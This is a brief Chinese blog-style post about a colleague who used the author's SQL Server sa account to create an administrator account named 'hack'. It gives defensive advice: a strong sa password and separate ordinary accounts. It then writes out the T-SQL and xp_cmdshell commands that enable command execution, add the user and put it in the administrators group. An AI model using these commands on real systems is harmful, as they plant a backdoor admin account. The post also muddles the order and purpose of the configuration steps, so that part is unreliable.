今天一位同事,通过访问我的数据库,直接在我的机子上建了个黑客账户。使我百思不得其解,在我看来我的机子还是比较安全的,但是通过他的实际操作,才使我恍然大悟,原来是我的数据库的sa账户在作怪。
他通过我的sa账户,执行了脚本,然后就给我的机子上建立了hack账户。
看来我们在使用数据库的时候,都不太注意对sa账户的管理,这是错误的,解决办法:
1:安全的sa密码,
2:因为sa的权限比较大,所以要提供给其他人使用的话,还是建个普通账户。
通过执行脚本,使xp_cmdshell命令可用:
EXEC sp_configure 'xp_cmdshell', 1
reconfigure
假如说,系统同时xp_cmdshell不可用,可以使用下面的脚本扩大权限。
EXEC sp_configure 'show advanced options', 1
reconfigure
然后,就可以建立账户了。
exec master.dbo.xp_cmdshell 'net user /add hack 123'
exec master.dbo.xp_cmdshell 'net localgroup administrators hack /add'
在这里0表示禁用,1表示启用。